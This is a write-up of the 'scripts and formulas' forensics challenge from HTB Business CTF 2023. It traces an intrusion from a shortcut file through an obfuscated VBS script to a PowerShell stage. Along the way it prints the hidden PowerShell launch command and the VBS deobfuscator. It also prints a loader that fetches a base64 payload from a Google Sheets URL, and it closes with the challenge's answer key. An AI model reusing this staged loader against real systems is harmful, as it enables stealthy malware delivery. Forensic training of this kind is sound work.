Hack the Box Business CTF 2023 - Write Up 'Scripts and Formulas'

This is a write up for the challenge “scripts and formulas” from the Hack the Box (HTB) Business CTF 2023. The task was classified as a forensics challenge.

Challenge

In the challenge description, it stated that a computer was compromised and that given some Windows logs and a vba script one should reconstruct what exactly happened.

Given Files

  • invoice.vbs
  • A lot (355) of Windows .evtx log files
  • A shortcut file

Solution

When looking at the shortcut file, one can see that the following command should be executed. This already gives the solution for the first question.

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Nop -sta -noni -w hidden -c cp C:\Windows\System32\cscript.exe .\calc.exe;.\calc.exe Invoice.vbs

For the next question, one has to look into the vba script. I put a (stripped) version here.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
Function ZbVxxAHCsiTnKpIJ()
    Dim yNSlalZeGAsokjsP
    Dim cMtARTHTmbqbxauA 
    Dim objShell
    Set objShell = WScript.CreateObject("WScript.Shell")
    yNSlalZeGAsokjsP = LLdunAaXwVgKfowf("BcV:L\XwFiInDdDoXw7s1...
    cMtARTHTmbqbxauA = yNSlalZeGAsokjsP & " " & LLdunAaXwVgKfo...
    objShell.Run cMtARTHTmbqbxauA
End Function
Function LLdunAaXwVgKfowf(t)
    Dim msStr()
    ReDim msStr(Len(t))
    Dim jKaNZCemSwPDrmLT
    jKaNZCemSwPDrmLT = ""
    For i = 1 To UBound(msStr)
        msStr(i) = Mid(t, i, 1)
    Next
    For Each qqEPRvFjIuMSmDvM In msStr
        If qqEPRvFjIuMSmDvM = LCase(qqEPRvFjIuMSmDvM) And Not ...
    Next
    LLdunAaXwVgKfowf = jKaNZCemSwPDrmLT
End Function

To understand what this program actually does, I replaced line 8 with a simple Debug.Print statement. Afterwards, I started Excel and just executed the program. This yielded the following (shortened) code. It basically gets some data from a base64-encoded URL and writes it to a file.

1
2
3
4
5
6
powershell.exe -c "$url =[system.convert]::frombase64string('aHR0cHM6L...');
$resp = invoke-restmethod -uri $url;
$payload = $resp.sheets[0].data[0].rowData[0].values[0].formattedValue;
$decode = [system.convert]::frombase64string($payload);
$ms = new-object system.io.memorystream;
$ms.write($decode,0, $decode.length);

If we decode the URL, we get the ID from the Google sheet that contains the payload, the API-key used and the cell in which the data stands.

https://sheets.googleapis.com/v4/spreadsheets/1HpB4GqqYwI6X71z4p2EK88XXX?key=AIzaSyDUpjSf7R1l1dQoXXX&ranges=Sheet1!O37

Finally, we want to know what that payload was. For that, we can look into the Windows logs - more specifically the Microsoft-Windows-PowerShell%4Operational.evtx log. Here, we can see what command was executed and can see that again some obfuscation with an XOR-operator was performed.

Log of the Powershell Execution with XOR Obfuscation

Log of the Powershell Execution with XOR Obfuscation

A lot of the questions could also be answered by just looking at the logs. Here an example for the code from the shortcut.

Log of the Initial Copy Command

Log of the Initial Copy Command

Now, we have all answers for the questions given by the nc-instance and can get our flag.

Questions and Answers from the netcat Instance

Which file was copied and what was the final file name?

cscript.exe:calc.exe

How is the function called that de-obfuscates code in the VBA script?

LLdunAaXwVgKfowf

How is the program called that is used for the next stage?

powershell.exe

What is the id of the spreadsheet that contains the payload?

1HpB4GqqYwI6X71z4p2EK88FoJjrsW2DKbSkx-ro5lQQ

In which cell was the payload hidden?

Sheet1:O37

Event ID for Powershell execution?

4104

Final payload - which key was used for the xor operation?

35